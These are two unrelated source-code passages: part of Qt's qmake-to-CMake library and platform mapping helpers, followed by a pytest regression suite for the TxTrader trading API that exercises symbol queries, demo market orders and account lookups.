"webenginewidgets", "Qt6", "Qt::WebEngineWidgets", extra=["COMPONENTS", "WebEngineWidgets"]
),
LibraryMapping("websockets", "Qt6", "Qt::WebSockets", extra=["COMPONENTS", "WebSockets"]),
LibraryMapping("webview", "Qt6", "Qt::WebView", extra=["COMPONENTS", "WebView"]),
LibraryMapping("widgets", "Qt6", "Qt::Widgets", extra=["COMPONENTS", "Widgets"]),
LibraryMapping("window-lib", "Qt6", "Qt::AppManWindow", extra=["COMPONENTS", "AppManWindow"]),
LibraryMapping("winextras", "Qt6", "Qt::WinExtras", extra=["COMPONENTS", "WinExtras"]),
LibraryMapping("x11extras", "Qt6", "Qt::X11Extras", extra=["COMPONENTS", "X11Extras"]),
LibraryMapping("xcb_qpa_lib", "Qt6", "Qt::XcbQpa", extra=["COMPONENTS", "XcbQpa"]),
LibraryMapping(
"xkbcommon_support", "Qt6", "Qt::XkbCommonSupport", extra=["COMPONENTS", "XkbCommonSupport"]
),
LibraryMapping("xmlpatterns", "Qt6", "Qt::XmlPatterns", extra=["COMPONENTS", "XmlPatterns"]),
LibraryMapping("xml", "Qt6", "Qt::Xml", extra=["COMPONENTS", "Xml"]),
LibraryMapping(
"qmlworkerscript", "Qt6", "Qt::QmlWorkerScript", extra=["COMPONENTS", "QmlWorkerScript"]
),
LibraryMapping(
"quickparticles", "Qt6", "Qt::QuickParticles", extra=["COMPONENTS", "QuickParticles"]
),
LibraryMapping(
"linuxofono_support",
"Qt6",
"Qt::LinuxOfonoSupport",
extra=["COMPONENTS", "LinuxOfonoSupport"],
),
LibraryMapping(
"linuxofono_support_private",
"Qt6",
"Qt::LinuxOfonoSupportPrivate",
extra=["COMPONENTS", "LinuxOfonoSupportPrivate"],
),
LibraryMapping("tools", "Qt6", "Qt::Tools", extra=["COMPONENTS", "Tools"]),
LibraryMapping("axcontainer", "Qt6", "Qt::AxContainer", extra=["COMPONENTS", "AxContainer"]),
LibraryMapping(
"webkitwidgets", "Qt6", "Qt::WebKitWidgets", extra=["COMPONENTS", "WebKitWidgets"]
),
LibraryMapping("zlib", "Qt6", "Qt::Zlib", extra=["COMPONENTS", "Zlib"]),
LibraryMapping("httpserver", "Qt6", "Qt::HttpServer", extra=["COMPONENTS", "HttpServer"]),
LibraryMapping("sslserver", "Qt6", "Qt::SslServer", extra=["COMPONENTS", "HttpServer"]),
]
# Note that the library map is adjusted dynamically further down.
_library_map = [
# 3rd party:
LibraryMapping("atspi", "ATSPI2", "PkgConfig::ATSPI2"),
LibraryMapping("bluez", "BlueZ", "PkgConfig::BlueZ"),
LibraryMapping("brotli", "WrapBrotli", "WrapBrotli::WrapBrotliDec"),
LibraryMapping("corewlan", None, None),
LibraryMapping("cups", "Cups", "Cups::Cups"),
LibraryMapping("directfb", "DirectFB", "PkgConfig::DirectFB"),
LibraryMapping("db2", "DB2", "DB2::DB2"),
LibraryMapping("dbus", "WrapDBus1", "dbus-1", resultVariable="DBus1", extra=["1.2"]),
LibraryMapping(
"doubleconversion", "WrapDoubleConversion", "WrapDoubleConversion::WrapDoubleConversion"
),
LibraryMapping("drm", "Libdrm", "Libdrm::Libdrm"),
LibraryMapping("egl", "EGL", "EGL::EGL"),
LibraryMapping("flite", "Flite", "Flite::Flite"),
LibraryMapping("flite_alsa", "ALSA", "ALSA::ALSA"),
LibraryMapping(
"fontconfig", "Fontconfig", "Fontconfig::Fontconfig", resultVariable="FONTCONFIG"
),
LibraryMapping(
"freetype",
"WrapFreetype",
"WrapFreetype::WrapFreetype",
extra=["2.2.0", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("gbm", "gbm", "gbm::gbm"),
LibraryMapping("glib", "GLIB2", "GLIB2::GLIB2"),
LibraryMapping("iconv", "WrapIconv", "WrapIconv::WrapIconv"),
LibraryMapping("gtk3", "GTK3", "PkgConfig::GTK3", extra=["3.6"]),
LibraryMapping("gssapi", "GSSAPI", "GSSAPI::GSSAPI"),
LibraryMapping(
"harfbuzz",
"WrapHarfbuzz",
"WrapHarfbuzz::WrapHarfbuzz",
is_bundled_with_qt=True,
extra=["2.6.0"],
),
LibraryMapping("host_dbus", None, None),
LibraryMapping(
"icu", "ICU", "ICU::i18n ICU::uc ICU::data", extra=["COMPONENTS", "i18n", "uc", "data"]
),
LibraryMapping("journald", "Libsystemd", "PkgConfig::Libsystemd"),
LibraryMapping("jpeg", "JPEG", "JPEG::JPEG"), # see also libjpeg
LibraryMapping("libatomic", "WrapAtomic", "WrapAtomic::WrapAtomic"),
LibraryMapping("libb2", "Libb2", "PkgConfig::Libb2"),
LibraryMapping("libclang", "WrapLibClang", "WrapLibClang::WrapLibClang"),
LibraryMapping("libdl", None, "${CMAKE_DL_LIBS}"),
LibraryMapping("libinput", "Libinput", "Libinput::Libinput"),
LibraryMapping("libjpeg", "JPEG", "JPEG::JPEG"), # see also jpeg
LibraryMapping("libpng", "WrapPNG", "WrapPNG::WrapPNG", is_bundled_with_qt=True),
LibraryMapping("libproxy", "Libproxy", "PkgConfig::Libproxy"),
LibraryMapping("librt", "WrapRt", "WrapRt::WrapRt"),
LibraryMapping("libudev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("lttng-ust", "LTTngUST", "LTTng::UST", resultVariable="LTTNGUST"),
LibraryMapping("mtdev", "Mtdev", "PkgConfig::Mtdev"),
LibraryMapping("mysql", "MySQL", "MySQL::MySQL"),
LibraryMapping("odbc", "ODBC", "ODBC::ODBC"),
LibraryMapping("opengl_es2", "GLESv2", "GLESv2::GLESv2"),
LibraryMapping("opengl", "WrapOpenGL", "WrapOpenGL::WrapOpenGL", resultVariable="WrapOpenGL"),
LibraryMapping(
"openssl_headers",
"WrapOpenSSLHeaders",
"WrapOpenSSLHeaders::WrapOpenSSLHeaders",
resultVariable="TEST_openssl_headers",
appendFoundSuffix=False,
test_library_overwrite="WrapOpenSSLHeaders::WrapOpenSSLHeaders",
run_library_test=True,
),
LibraryMapping(
"openssl",
"WrapOpenSSL",
"WrapOpenSSL::WrapOpenSSL",
resultVariable="TEST_openssl",
appendFoundSuffix=False,
run_library_test=True,
no_link_so_name="openssl_headers",
),
LibraryMapping("oci", "Oracle", "Oracle::OCI"),
LibraryMapping(
"pcre2",
"WrapPCRE2",
"WrapPCRE2::WrapPCRE2",
extra=["10.20", "REQUIRED"],
is_bundled_with_qt=True,
),
LibraryMapping("pps", "PPS", "PPS::PPS"),
LibraryMapping("psql", "PostgreSQL", "PostgreSQL::PostgreSQL"),
LibraryMapping("slog2", "Slog2", "Slog2::Slog2"),
LibraryMapping("speechd", "SpeechDispatcher", "SpeechDispatcher::SpeechDispatcher"),
LibraryMapping("sqlite2", None, None), # No more sqlite2 support in Qt6!
LibraryMapping("sqlite3", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("sqlite", "SQLite3", "SQLite::SQLite3"),
LibraryMapping("tslib", "Tslib", "PkgConfig::Tslib"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"),
LibraryMapping("udev", "Libudev", "PkgConfig::Libudev"), # see also libudev!
LibraryMapping("vulkan", "Vulkan", "Vulkan::Vulkan"),
LibraryMapping("wayland_server", "Wayland", "Wayland::Server"), # used in qtbase/src/gui
LibraryMapping("wayland-server", "Wayland", "Wayland::Server"), # used in qtwayland
LibraryMapping("wayland-client", "Wayland", "Wayland::Client"),
LibraryMapping("wayland-cursor", "Wayland", "Wayland::Cursor"),
LibraryMapping("wayland-egl", "Wayland", "Wayland::Egl"),
LibraryMapping(
"wayland-kms", "Waylandkms", "PkgConfig::Waylandkms"
), # TODO: check if this actually works
LibraryMapping("x11", "X11", "X11::X11"),
LibraryMapping("x11sm", "X11", "${X11_SM_LIB} ${X11_ICE_LIB}", resultVariable="X11_SM"),
LibraryMapping(
"xcb",
"XCB",
"XCB::XCB",
extra=["1.11"],
resultVariable="TARGET XCB::XCB",
appendFoundSuffix=False,
),
LibraryMapping(
"xcb_glx", "XCB", "XCB::GLX", extra=["COMPONENTS", "GLX"], resultVariable="XCB_GLX"
),
LibraryMapping(
"xcb_icccm",
"XCB",
"XCB::ICCCM",
extra=["0.3.9", "COMPONENTS", "ICCCM"],
resultVariable="XCB_ICCCM",
),
LibraryMapping(
"xcb_image",
"XCB",
"XCB::IMAGE",
extra=["0.3.9", "COMPONENTS", "IMAGE"],
resultVariable="XCB_IMAGE",
),
LibraryMapping(
"xcb_keysyms",
"XCB",
"XCB::KEYSYMS",
extra=["0.3.9", "COMPONENTS", "KEYSYMS"],
resultVariable="XCB_KEYSYMS",
),
LibraryMapping(
"xcb_randr", "XCB", "XCB::RANDR", extra=["COMPONENTS", "RANDR"], resultVariable="XCB_RANDR"
),
LibraryMapping(
"xcb_render",
"XCB",
"XCB::RENDER",
extra=["COMPONENTS", "RENDER"],
resultVariable="XCB_RENDER",
),
LibraryMapping(
"xcb_renderutil",
"XCB",
"XCB::RENDERUTIL",
extra=["0.3.9", "COMPONENTS", "RENDERUTIL"],
resultVariable="XCB_RENDERUTIL",
),
LibraryMapping(
"xcb_shape", "XCB", "XCB::SHAPE", extra=["COMPONENTS", "SHAPE"], resultVariable="XCB_SHAPE"
),
LibraryMapping(
"xcb_shm", "XCB", "XCB::SHM", extra=["COMPONENTS", "SHM"], resultVariable="XCB_SHM"
),
LibraryMapping(
"xcb_sync", "XCB", "XCB::SYNC", extra=["COMPONENTS", "SYNC"], resultVariable="XCB_SYNC"
),
LibraryMapping(
"xcb_xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb-xfixes",
"XCB",
"XCB::XFIXES",
extra=["COMPONENTS", "XFIXES"],
resultVariable="XCB_XFIXES",
),
LibraryMapping(
"xcb_xinput",
"XCB",
"XCB::XINPUT",
extra=["1.12", "COMPONENTS", "XINPUT"],
resultVariable="XCB_XINPUT",
),
LibraryMapping(
"xcb_xkb", "XCB", "XCB::XKB", extra=["COMPONENTS", "XKB"], resultVariable="XCB_XKB"
),
LibraryMapping("xcb_xlib", "X11_XCB", "X11::XCB"),
LibraryMapping("xcomposite", "XComposite", "PkgConfig::XComposite"),
LibraryMapping("xkbcommon_evdev", "XKB", "XKB::XKB", extra=["0.5.0"]), # see also xkbcommon
LibraryMapping("xkbcommon_x11", "XKB_COMMON_X11", "PkgConfig::XKB_COMMON_X11", extra=["0.5.0"]),
LibraryMapping("xkbcommon", "XKB", "XKB::XKB", extra=["0.5.0"]),
LibraryMapping("xlib", "X11", "X11::X11"),
LibraryMapping("xrender", "XRender", "PkgConfig::XRender", extra=["0.6"]),
LibraryMapping("zlib", "ZLIB", "ZLIB::ZLIB", extra=["1.0.8"]),
LibraryMapping("zstd", "ZSTD", "ZSTD::ZSTD", extra=["1.3"]),
LibraryMapping("tiff", "TIFF", "TIFF::TIFF"),
LibraryMapping("webp", "WrapWebP", "WrapWebP::WrapWebP"),
LibraryMapping("jasper", "WrapJasper", "WrapJasper::WrapJasper"),
LibraryMapping("sdl2", "WrapSDL2", "WrapSDL2::WrapSDL2"),
LibraryMapping("hunspell", "Hunspell", "Hunspell::Hunspell"),
LibraryMapping(
"qt3d-assimp",
"WrapQt3DAssimp",
"WrapQt3DAssimp::WrapQt3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_assimp",
appendFoundSuffix=False,
),
LibraryMapping(
"quick3d_assimp",
"WrapQuick3DAssimp",
"WrapQuick3DAssimp::WrapQuick3DAssimp",
extra=["5"],
run_library_test=True,
resultVariable="TEST_quick3d_assimp",
appendFoundSuffix=False,
),
]
def _adjust_library_map():
# Assign a Linux condition on all x and wayland related packages.
# We don't want to get pages of package not found messages on
# Windows and macOS, and this also improves configure time on
# those platforms.
linux_package_prefixes = ["xcb", "x11", "xkb", "xrender", "xlib", "wayland"]
for i, _ in enumerate(_library_map):
if any([_library_map[i].soName.startswith(p) for p in linux_package_prefixes]):
_library_map[i].emit_if = "config.linux"
_adjust_library_map()
def find_3rd_party_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
for i in _library_map:
if i.soName == soName:
return i
return None
def find_qt_library_mapping(soName: str) -> typing.Optional[LibraryMapping]:
for i in _qt_library_map:
if i.soName == soName:
return i
return None
def find_library_info_for_target(targetName: str) -> typing.Optional[LibraryMapping]:
qt_target = targetName
if targetName.endswith("Private"):
qt_target = qt_target[:-7]
for i in _qt_library_map:
if i.targetName == qt_target:
return i
for i in _library_map:
if i.targetName == targetName:
return i
return None
# For a given qmake library (e.g. 'openssl_headers'), check whether this is a fake library used
# for the /nolink annotation, and return the actual annotated qmake library ('openssl/nolink').
def find_annotated_qmake_lib_name(lib : str) -> str:
for entry in _library_map:
if entry.no_link_so_name == lib:
return entry.soName + "/nolink"
return lib
def featureName(name: str) -> str:
replacement_char = "_"
if name.startswith("c++"):
replacement_char = "x"
return re.sub(r"[^a-zA-Z0-9_]", replacement_char, name)
def map_qt_library(lib: str) -> str:
private = False
if lib.endswith("-private"):
private = True
lib = lib[:-8]
mapped = find_qt_library_mapping(lib)
qt_name = lib
if mapped:
assert mapped.targetName # Qt libs must have a target name set
qt_name = mapped.targetName
if private:
qt_name += "Private"
return qt_name
platform_mapping = {
"win32": "WIN32",
"win": "WIN32",
"unix": "UNIX",
"darwin": "APPLE",
"linux": "LINUX",
"integrity": "INTEGRITY",
"qnx": "QNX",
"vxworks": "VXWORKS",
"hpux": "HPUX",
"nacl": "NACL",
"android": "ANDROID",
"android-embedded": "ANDROID_EMBEDDED",
"uikit": "UIKIT",
"tvos": "TVOS",
"watchos": "WATCHOS",
"winrt": "WINRT",
"wasm": "WASM",
"emscripten": "EMSCRIPTEN",
"msvc": "MSVC",
"clang": "CLANG",
"gcc": "GCC",
"icc": "ICC",
"intel_icc": "ICC",
"osx": "MACOS",
"ios": "IOS",
"freebsd": "FREEBSD",
"openbsd": "OPENBSD",
"mingw": "MINGW",
"netbsd": "NETBSD",
"haiku": "HAIKU",
"mac": "APPLE",
"macx": "MACOS",
"macos": "MACOS",
"macx-icc": "(MACOS AND ICC)",
}
def map_platform(platform: str) -> str:
""" Return the qmake platform as cmake platform or the unchanged string. """
return platform_mapping.get(platform, platform)
def is_known_3rd_party_library(lib: str) -> bool:
handling_no_link = False
if lib.endswith("/nolink") or lib.endswith("_nolink"):
lib = lib[:-7]
handling_no_link = True
mapping = find_3rd_party_library_mapping(lib)
if handling_no_link and mapping and mapping.no_link_so_name:
no_link_mapping = find_3rd_party_library_mapping(mapping.no_link_so_name)
if no_link_mapping:
mapping = no_link_mapping
return mapping is not None
def map_3rd_party_library(lib: str) -> str:
handling_no_link = False
libpostfix = ""
if lib.endswith("/nolink"):
lib = lib[:-7]
libpostfix = "_nolink"
handling_no_link = True
mapping = find_3rd_party_library_mapping(lib)
if handling_no_link and mapping and mapping.no_link_so_name:
no_link_mapping = find_3rd_party_library_mapping(mapping.no_link_so_name)
if no_link_mapping:
mapping = no_link_mapping
libpostfix = ""
if not mapping or not mapping.targetName:
return lib
return mapping.targetName + libpostfix
compile_test_dependent_library_mapping = {
"dtls": {"openssl": "openssl_headers"},
"ocsp": {"openssl": "openssl_headers"},
}
def get_compile_test_dependent_library_mapping(compile_test_name: str, dependency_name: str):
if compile_test_name in compile_test_dependent_library_mapping:
mapping = compile_test_dependent_library_mapping[compile_test_name]
if dependency_name in mapping:
return mapping[dependency_name]
return dependency_name
def generate_find_package_info(
lib: LibraryMapping,
use_qt_find_package: bool = True,
*,
indent: int = 0,
emit_if: str = "",
use_system_package_name: bool = False,
module: str = "",
) -> str:
isRequired = False
extra = lib.extra.copy()
if "REQUIRED" in extra and use_qt_find_package:
isRequired = True
extra.remove("REQUIRED")
cmake_target_name = lib.targetName
assert cmake_target_name
# _nolink or not does not matter at this point:
if cmake_target_name.endswith("_nolink") or cmake_target_name.endswith("/nolink"):
cmake_target_name = cmake_target_name[:-7]
initial_package_name: str = lib.packageName if lib.packageName else ""
package_name: str = initial_package_name
if use_system_package_name:
replace_args = ["Wrap", "WrapSystem"]
package_name = package_name.replace(*replace_args) # type: ignore
cmake_target_name = cmake_target_name.replace(*replace_args) # type: ignore
if use_qt_find_package:
if cmake_target_name:
extra += ["PROVIDED_TARGETS", cmake_target_name]
if module:
extra += ["MODULE_NAME", module]
extra += ["QMAKE_LIB", find_annotated_qmake_lib_name(lib.soName)]
result = ""
one_ind = " "
ind = one_ind * indent
if use_qt_find_package:
if extra:
result = f"{ind}qt_find_package({package_name} {' '.join(extra)})\n"
else:
result = f"{ind}qt_find_package({package_name})\n"
if isRequired:
result += (
f"{ind}set_package_properties({initial_package_name} PROPERTIES TYPE REQUIRED)\n"
)
else:
if extra:
result = f"{ind}find_package({package_name} {' '.join(extra)})\n"
else:
result = f"{ind}find_package({package_name})\n"
# If a package should be found only in certain conditions, wrap
# the find_package call within that condition.
if emit_if:
result = f"if(({emit_if}) OR QT_FIND_ALL_PACKAGES_ALWAYS)\n{one_ind}{result}endif()\n"
return result
def _set_up_py_parsing_nicer_debug_output(pp):
indent = -1
def increase_indent(fn):
def wrapper_function(*args):
nonlocal indent
indent += 1
print("> " * indent, end="")
return fn(*args)
return wrapper_function
def decrease_indent(fn):
def wrapper_function(*args):
nonlocal indent
print("> " * indent, end="")
indent -= 1
return fn(*args)
return wrapper_function
pp._defaultStartDebugAction = increase_indent(pp._defaultStartDebugAction)
pp._defaultSuccessDebugAction = decrease_indent(pp._defaultSuccessDebugAction)
pp._defaultExceptionDebugAction = decrease_indent(pp._defaultExceptionDebugAction)
|
# -*- coding: utf-8 -*-
"""
test-txtrader.py
--------------
TxTrader unit/regression test script
Copyright (c) 2016 Reliance Systems Inc. <mkrueger@rstms.net>
Licensed under the MIT license. See LICENSE for details.
"""
from txtrader_client import API
import subprocess
import os
import signal
import time
import ujson as json
from pprint import pprint, pformat
import pytest
import re
import datetime
WAIT_FOR_FILL = False
FILL_TIMEOUT = 30
TEST_ALGO_ROUTE = '{"TEST-ATM-ALGO":{"STRAT_ID":"BEST","BOOKING_TYPE":"3","STRAT_TIME_TAGS":"168;126","STRAT_PARAMETERS":{"99970":"2","99867":"N","847":"BEST","90057":"BEST","91000":"4.1.95"},"ORDER_FLAGS_3":"0","ORDER_CLONE_FLAG":"1","STRAT_TARGET":"ATDL","STRATEGY_NAME":"BEST","STRAT_REDUNDANT_DATA":{"UseStartTime":"false","UseEndTime":"false","cConditionalType":"{NULL}"},"STRAT_TIME_ZONE":"America/New_York","STRAT_TYPE":"COWEN_ATM_US_EQT","STRAT_STRING_40":"BEST","UTC_OFFSET":"-240"}}'
TEST_MODE = 'RTX'
TEST_HOST = os.environ['TXTRADER_HOST']
TEST_PORT = int(os.environ['TXTRADER_HTTP_PORT'])
def _listening(host, port, timeout=15):
return not bool(os.system(f'wait-for-it -s {host}:{port} -t {timeout}'))
def _wait_api_status(TEST_MODE, timeout=15):
start = time.time()
status = None
last_status = None
api = None
while status != 'Up':
try:
if not api:
api = API(TEST_MODE)
print(f'new api connection: {api}')
except Exception as ex:
print(f'Connection raised {ex}, retrying...')
api = None
time.sleep(1)
else:
assert api
try:
status = api.status()
except Exception as ex:
print(f'status query on {api} raised {ex}, retrying...')
api = None
time.sleep(1)
else:
if last_status != status:
print(f"status={status}")
last_status = status
assert (time.time() - start) < timeout, 'timeout waiting for initialization'
time.sleep(1)
return api
@pytest.fixture(scope='module')
def api():
print('fixture: creating api connection')
assert _listening(TEST_HOST, TEST_PORT)
api = _wait_api_status(TEST_MODE)
return api
def dump(label, o):
print('%s:\n%s' % (label, pformat(json.dumps(o))))
def test_init(api):
print()
print('test_init checking api')
assert api
assert api.status() == 'Up'
print('waiting 1 second...')
time.sleep(1)
print('done')
def test_shutdown_and_reconnect():
print('\nconnecting...')
api = _wait_api_status(TEST_MODE)
assert api
assert api.status() == 'Up'
shutdown_time = time.time()
shutdown = time.time()
print('shutting down api')
try:
api.shutdown('testing shutdown request')
print('waiting for shutdown...')
time.sleep(5)
print('waiting for restart...')
except Exception as ex:
print(f'shutdown raised {ex}')
assert False
assert _listening(TEST_HOST, TEST_PORT, 60), 'timeout waiting for restart'
try:
api = _wait_api_status(TEST_MODE, 90)
except Exception as ex:
print(f'restart raised {ex}')
assert False
assert api
assert api.status() == 'Up'
def test_stock_prices(api):
slist = set(api.query_symbols())
s = api.add_symbol('IBM')
assert s
p = api.query_symbol('IBM')
assert p
assert type(p) == dict
print(repr(p))
tdata = [
('symbol', str, True),
('fullname', str, True),
('last', float, True),
('size', int, True),
('volume', int, True),
('open', float, True),
('high', float, True),
('low', float, True),
('close', float, True),
('vwap', float, True),
('tradetime', str, True),
('cusip', str, True),
]
#('bars', list, True),
for key, _type, required in tdata:
assert key in p
assert type(p[key]) == _type
if required:
assert not p[key] == None
r = api.query_symbol_data('IBM')
assert r
dump('raw data for IBM', r)
l = api.query_symbols()
assert l
dump('symbol list', l)
assert 'IBM' in l
s = api.add_symbol('TSLA')
assert s
dump('add TSLA', s)
s = api.add_symbol('GOOG')
assert s
dump('add GOOG', s)
s = api.add_symbol('AAPL')
assert s
dump('add AAPL', s)
l = api.query_symbols()
assert set(['IBM', 'TSLA', 'GOOG', 'AAPL']).issubset(set(l))
dump('symbol list', l)
s = api.del_symbol('TSLA')
assert s
dump('del TSLA', s)
l = api.query_symbols()
if not 'TSLA' in slist:
assert not 'TSLA' in l
assert set(['IBM', 'GOOG', 'AAPL']).issubset(set(l))
dump('symbol list', l)
print(repr(l))
def test_buy_sell(api):
print()
account = api.account
print('account=%s' % account)
api.set_account(account)
print('buying IBM')
oid = _market_order(api, 'IBM', 100)
o = api.query_order(oid)
assert o
assert type(o) == dict
assert 'permid' in o
oid = o['permid']
assert 'status' in o
dump('market_order(IBM,100)', o)
print('selling IBM')
oid = _market_order(api, 'IBM', -100)
o = api.query_order(oid)
assert o
assert type(o) == dict
assert 'permid' in o
assert 'status' in o
dump('market_order(IBM,-100)', o)
def test_set_order_route(api):
print()
oldroute = api.get_order_route()
assert type(oldroute) == dict
assert list(oldroute.keys()) == ['DEMOEUR']
r0 = 'DEMO'
r1 = {'DEMO': None}
r2 = {'DEMO': {'key1': 'value1', 'key2': 'value2'}}
r3 = TEST_ALGO_ROUTE
for rin, rout in [(r0, r1), (r1, r1), (r2, r2), (json.dumps(r0), r1), (json.dumps(r1), r1), (json.dumps(r2), r2),
(r3, json.loads(r3))]:
print('set_order_route(%s)' % repr(rin))
assert api.set_order_route(rin) == rout
assert api.get_order_route() == rout
assert api.set_order_route(oldroute) == oldroute
def test_partial_fill(api):
print()
account = api.account
route = 'DEMO'
oldroute = api.get_order_route()
assert api.set_order_route(route)
assert api.get_order_route() == {route: None}
quantity = 1000
symbol = 'COWN'
print('buying %d %s' % (quantity, symbol))
p = api.add_symbol(symbol)
assert p
d = api.query_symbol_data(symbol)
#pprint(d)
now = datetime.datetime.now().strftime('%H:%M:%S')
print(f"trading hours: {d["STARTTIME"]} to {d["STOPTIME"]}")
during_trading_hours = bool(d['STARTTIME'] <= now <= d['STOPTIME'])
print(f"now={now} during_trading_hours={during_trading_hours}")
o = api.market_order(account, route, symbol, quantity)
assert o
assert 'permid' in o
assert 'status' in o
assert not o['status'] == 'Filled'
oid = o['permid']
print('oid=%s' % oid)
partial_fills = 0
while o['status'] != 'Filled':
o = api.query_order(oid)
#o={'status':'spoofed','TYPE':'spoofed'}
#pprint(o)
status = o['status']
filled = o['filled'] if 'filled' in o else 0
remaining = o['remaining'] if 'remaining' in o else 0
if (int(filled) > 0) and (int(remaining) > 0) and (int(filled) < quantity):
partial_fills += 1
average_price = o['avgfillprice'] if 'avgfillprice' in o else None
print(
'status=%s filled=%s remaining=%s average_price=%s type=%s' % (status, filled, remaining, average_price, o['type'])
)
assert not (status == 'Filled' and filled < quantity)
if not during_trading_hours:
print('test verification disabled - simulated market is closed')
partial_fills = -1
break
assert status in ['Submitted', 'Pending', 'Filled']
time.sleep(1)
assert partial_fills
o = api.market_order(account, route, symbol, quantity * -1)
assert api.set_order_route(oldroute)
def test_status(api):
assert api.status() == 'Up'
def test_uptime(api):
uptime = api.uptime()
assert uptime
print('uptime: %s' % repr(uptime))
assert type(uptime) == str
def test_version(api):
assert api.version()
def test_symbol_price(api):
orig_symbols = api.query_symbols()
assert type(orig_symbols) == list
if 'AAPL' in orig_symbols:
ret = api.del_symbol('AAPL')
assert ret
symbols = api.query_symbols()
assert type(symbols) == list
if not 'AAPL' in orig_symbols:
assert not 'AAPL' in symbols
price = api.query_symbol('AAPL')
#assert not price
assert price
ret = api.add_symbol('AAPL')
assert ret
p = api.query_symbol('AAPL')
assert p
assert type(p) == dict
assert p['symbol'] == 'AAPL'
def _verify_barchart_enabled(api, option):
v = api.version()
assert option in ['SYMBOL_BARCHART', 'BARCHART']
assert v
assert type(v) == dict
assert type(v['flags']) == dict
assert option in v['flags']
return v['flags'][option] == True
def test_symbol_bars(api):
if 'TSLA' in api.query_symbols():
assert api.del_symbol('TSLA')
assert api.add_symbol('TSLA')
assert 'TSLA' in api.query_symbols()
bars = api.query_symbol_bars('TSLA')
assert type(bars) == list
print(repr(bars))
if _verify_barchart_enabled(api, 'SYMBOL_BARCHART'):
assert type(bars[0]) == list
for bar in bars:
print('%s' % repr(bar))
for i in range(len(bar)):
assert type(bar[i]) in [[str], [str], [float], [float], [float], [float], [int]][i]
assert re.match('^\\d\\d\\d\\d-\\d\\d-\\d\\d$', bar[0])
assert re.match('^\\d\\d:\\d\\d:\\d\\d$', bar[1])
else:
print('barchart disabled')
assert bars == []
def test_query_accounts(api):
test_account = api.account
accounts = api.query_accounts()
assert type(accounts) == list
assert accounts
for a in accounts:
assert type(a) == str or type(a) == str
assert test_account in accounts
ret = api.set_account(test_account)
assert ret
ret = api.query_account('b.b.b.INVALID_ACCOUNT')
assert ret == None
ret = api.query_account(test_account, 'INVALID_FIELD')
assert ret == None
ret = api.query_account(test_account, 'INVALID_FIELD_1,INVALID_FIELD_2')
assert ret == None
#print('query_account(%s)...' % a)
data = api.query_account(test_account)
#print('account[%s]: %s' % (a, repr(data)))
assert data
assert type(data) == dict
fields = [k for k in data if not k.startswith('_')]
if TEST_MODE == 'RTX':
field = 'EXCESS_EQ'
elif TEST_MODE == 'TWS':
field = 'LiquidationValue'
# txtrader is expected to set the value _cash to the correct field
assert '_cash' in data
assert float(data['_cash']) == round(float(data[field]), 2)
sdata = api.query_account(test_account, field)
assert sdata
assert type(sdata) == dict
assert field in sdata
rfields = ','.join(fields[:3])
print('requesting fields: %s' % rfields)
sdata = api.query_account(test_account, rfields)
print('got %s' % repr(sdata))
assert sdata
assert type(sdata) == dict
for field in rfields.split(','):
assert field in sdata
assert set(rfields.split(',')) == set(sdata.keys())
#print('account[%s]: %s' % (a, repr(sdata)))
def _wait_for_fill(api, oid, return_on_error=False):
print('Waiting for order %s to fill...' % oid)
done = False
last_status = ''
count = 0
while not done:
o = api.query_order(oid)
if last_status != o['status']:
last_status = o['status']
print('order status: %s' % o['status'])
if return_on_error and o['status'] == 'Error':
return
assert o['status'] != 'Error'
if o['status'] == 'Filled':
done = True
else:
count += 1
if WAIT_FOR_FILL:
assert count < FILL_TIMEOUT
time.sleep(1)
else:
if o['status'] == 'Pending':
print("fill wait disabled, returning")
done = True
def _position(api, account):
pos = api.query_positions()
assert type(pos) == dict
assert account in pos
if account in pos:
p = pos[account]
assert type(p) == dict
else:
p = {}
return p
def _market_order(api, symbol, quantity, return_on_error=False):
print('Sending market_order(%s, %d)...' % (symbol, quantity))
account = api.account
route = 'DEMOEUR'
o = api.market_order(account, route, symbol, quantity)
print('market_order returned %s' % repr(o))
assert o
assert 'permid' in o
assert 'status' in o
oid = o['permid']
assert type(oid) == str
print('market_order(%s,%s) returned oid=%s status=%s' % (symbol, quantity, oid, o['status']))
_wait_for_fill(api, oid, return_on_error)
return oid
def test_trades(api):
account = api.account
route = 'DEMOEUR'
oid = _market_order(api, 'AAPL', 1)
p = _position(api, account)
if 'AAPL' in p and p['AAPL'] != 0:
oid = _market_order(api, 'AAPL', -1 * p['AAPL'])
ostat = api.query_order(oid)
assert ostat
assert type(ostat) == dict
assert 'permid' in ostat
p = _position(api, account)
if WAIT_FOR_FILL:
assert not 'AAPL' in p or p['AAPL'] == 0
else:
print('not testing order results')
oid = _market_order(api, 'AAPL', 100)
p = _position(api, account)
assert p
assert type(p) == dict
if WAIT_FOR_FILL:
assert 'AAPL' in p
assert p['AAPL'] == 100
else:
print('not testing order results')
oid = _market_order(api, 'AAPL', -10)
p = _position(api, account)
if WAIT_FOR_FILL:
assert 'AAPL' in p
assert p['AAPL'] == 90
else:
print('not testing order results')
@pytest.mark.staged
def test_staged_trades(api):
account = api.account
route = 'DEMOEUR'
t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'GOOG', 10)
assert t
assert type(t) == dict
assert 'permid' in t
oid = t['permid']
print('Created staged order %s, awaiting user execution from RealTick' % oid)
_wait_for_fill(api, oid)
@pytest.mark.staged
def test_staged_trade_cancel(api):
account = api.account
route = 'DEMOEUR'
t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, 'INTC', 10)
assert t
assert type(t) == dict
assert 'permid' in t
oid = t['permid']
print('Created staged order %s, awaiting user cancellation from RealTick' % oid)
_wait_for_fill(api, oid, True)
t = api.query_order(oid)
assert t
assert type(t) == dict
assert 'status' in t
assert t['status'] == 'Error'
assert 'REASON' in t['raw']
assert t['raw']['REASON'].lower().startswith('user cancel')
print('detected user cancel of %s' % oid)
#@pytest.mark.staged
def test_staged_trade_execute(api):
account = api.account
route = 'DEMOEUR'
trade_symbol = 'AAPL'
trade_quantity = 10
t = api.stage_market_order('TEST.%s' % str(time.time()), account, route, trade_symbol, trade_quantity)
assert t
assert type(t) == dict
assert 'permid' in t
